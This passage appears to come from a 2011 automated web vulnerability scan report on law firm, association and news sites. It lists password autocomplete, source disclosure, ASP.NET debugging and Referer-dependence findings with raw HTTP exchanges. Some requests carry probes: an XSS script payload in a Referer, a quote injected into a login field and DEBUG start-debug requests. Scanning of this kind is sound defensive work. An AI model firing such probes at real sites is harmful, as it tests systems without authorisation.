IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000EomNXSy4TXZVIAszHpfxWyJ:140i3s34m; Path=/
Keep-Alive: timeout=10, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/
Content-Length: 59570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9zN0dxbDQwMDkwMDAxLzE3MzY4NDUvbGk!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...
19.19. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:29 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000GNJvwOeybIylqfuGPV4Evvo:140i3s34m; Path=/
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:14 GMT;path=/
Content-Length: 60146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Gc3g5OjQ5NzcwMDAxLzE3MzY4MzYvbGk!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...
19.20. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:29 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000GNJvwOeybIylqfuGPV4Evvo:140i3s34m; Path=/
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:14 GMT;path=/
Content-Length: 60146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Wc3g5OjQ5NzcwMDAyLzE3MzY4MzcvbGk!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Perkins-Coie-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
<div id="minCharMembership">
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...
19.21. http://www.wi-ala.org/ClubPortal/wala/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ClubPortal/wala/ HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522775;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFTOKEN=160c8b3f842edead-E5661479-9CF0-1BCF-8A4BC5F474D9CD94;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522775%26CFTOKEN%23%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23hitcount%3D2%23cftoken%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23cfid%3D26522775%23;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

   <title>
   Wisconsin Association of
...[SNIP]...
<div style="margin-left:10px; margin-top:10px;">
   <form name="CFForm_1" id="CFForm_1" action="/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" class="1288form" onsubmit="return _CF_checkCFForm_1(this)">
   <input type="hidden" name="cftokenvalue" value="160c8b3f842edead-E5661479-9CF0-1BCF-8A4BC5F474D9CD94" />
...[SNIP]...
<br>
   <input name="password" id="password" type="password" class="1288formtext" size="9" /><br>
...[SNIP]...
19.22. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3837 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<div style="margin-left:10px; margin-top:10px;">
   <form name="CFForm_1" id="CFForm_1" action="/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" class="1288form" onsubmit="return _CF_checkCFForm_1(this)">
   <input type="hidden" name="cftokenvalue" value="a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD" />
...[SNIP]...
<br>
   <input name="password" id="password" type="password" class="1288formtext" size="9" /><br>
...[SNIP]...
19.23. http://www.wi-ala.org/clubportal/memLogin.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/memLogin.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination%2E&username=%27 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D11%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.7.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D12%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<table width="175" border="0" cellspacing="0" cellpadding="2" bgcolor="E8E8E8">
<form name="login" id="login" action="http://www.wi-ala.org/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" onsubmit="return _CF_checklogin(this)">
   <input type="hidden" name="cftokenvalue" value="a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD" />
...[SNIP]...
<td width="100"><input name="password" id="password" type="password" size="12" /></td>
...[SNIP]...
19.24. http://www.wi-ala.org/clubportal/wala/Page.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/wala/Page.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /clubportal/wala/Page.cfm?clubID=177&pubmenuoptID=1361 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.6.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D9%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>
Membership -
...[SNIP]...
<div style="margin-left:10px; margin-top:10px;">
   <form name="CFForm_1" id="CFForm_1" action="/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" class="1288form" onsubmit="return _CF_checkCFForm_1(this)">
   <input type="hidden" name="cftokenvalue" value="a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD" />
...[SNIP]...
<br>
   <input name="password" id="password" type="password" class="1288formtext" size="9" /><br>
...[SNIP]...
20. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

20.1. http://graphics8.nytimes.com/js/app/article/articleCommentCount.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/article/articleCommentCount.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/article/articleCommentCount.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=61755AB5B621ED6279F440ECA861ED6F&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.20.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 5790
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Feb 2010 19:56:51 GMT
ETag: "169e-4b71be03"
Accept-Ranges: bytes
Cache-Control: private, max-age=316595
Date: Thu, 12 May 2011 19:53:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5790

/* $Id: articleCommentCount.js 30909 2010-02-05 16:19:17Z patras $
/js/app/article/articleCommentCount.js
(c) 2009 The New York Times Company */

NYTD.require('/js/app/lib/NYTD/0.0.1/template.js');

/
...[SNIP]...
<blockquote><%= msg %></blockquote>\
<% if(cite !== false) { %>\
<cite><%= cite %></cite>
...[SNIP]...
<ul class="more">\
<% if(cite !== false) { %>\
<li><a href="<%= url %>?permid=<%= commentId %>#comment<%= commentId %>" rel="2v">
...[SNIP]...
</li>\
<% if (canSubmit == true) { %>\
<li><a href="<%= url %>#postComment" rel="2p">
...[SNIP]...
<% } %>\
<% } else { %>\
<% if (canSubmit == true) { %>\
<li><a href="<%= url %>#postComment" rel="2p">
...[SNIP]...
</li>\
<% if(count > 0) { %>\
<li><a href="<%= url %>" rel="3v">Read All Comments (<%= count %>) &#187;</a>
...[SNIP]...
<% } %>\
<% } else { %>\
<li><a href="<%= url %>" rel="3v">Read All Comments <% if (count > 0) { %>(<%= count %>)<% } %>
...[SNIP]...
20.2. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js2/lib/facebook/article/1.0/build.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js2/lib/facebook/article/1.0/build.min.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=61755AB5B621ED6279F440ECA861ED6F&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.20.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO
If-Modified-Since: Thu, 05 May 2011 18:59:30 GMT
If-None-Match: "4e6e-4dc2f392"

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 20078
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 18:59:38 GMT
ETag: "4e6e-4dc2f39a"
Accept-Ranges: bytes
Cache-Control: private, max-age=2210
Date: Thu, 12 May 2011 19:53:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 20078

NYTD.track=function(){if("dcsMultiTrack" in window){dcsMultiTrack.apply(this,arguments)}else{setTimeout(function(){NYTD.track.apply(this,arguments)},1000)}};NYTD.Facebook={APP_ID:"9869919170",API_KEY:
...[SNIP]...
<div class="activity"> <% if (user.image) { %> <img class="userImage" height="25" width="25" src="<%= user.image %>" />
...[SNIP]...
<a href="<%= user.href %>"><%= user.name %></a>
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<div class="activity"> <% if (img) { %> <img class="runaroundRight" height="50" width="50" src="<%= img %>" />
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<span><%= label %></span>
...[SNIP]...
21. ASP.NET debugging enabled  previous  next
There are 3 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

21.1. http://www.ctlawtribune.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ctlawtribune.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ctlawtribune.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 16:55:08 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
21.2. http://www.howardrice.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.howardrice.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.howardrice.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 16:09:19 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
21.3. http://www.iimagazine.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.iimagazine.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.iimagazine.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 16:55:25 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
22. Referer-dependent response  previous  next
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

22.1. http://centrifugesystems.app101.hubspot.com/Inactive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://centrifugesystems.app101.hubspot.com
Path:   /Inactive.aspx

Request 1

GET /Inactive.aspx?type=18 HTTP/1.1
Host: centrifugesystems.app101.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
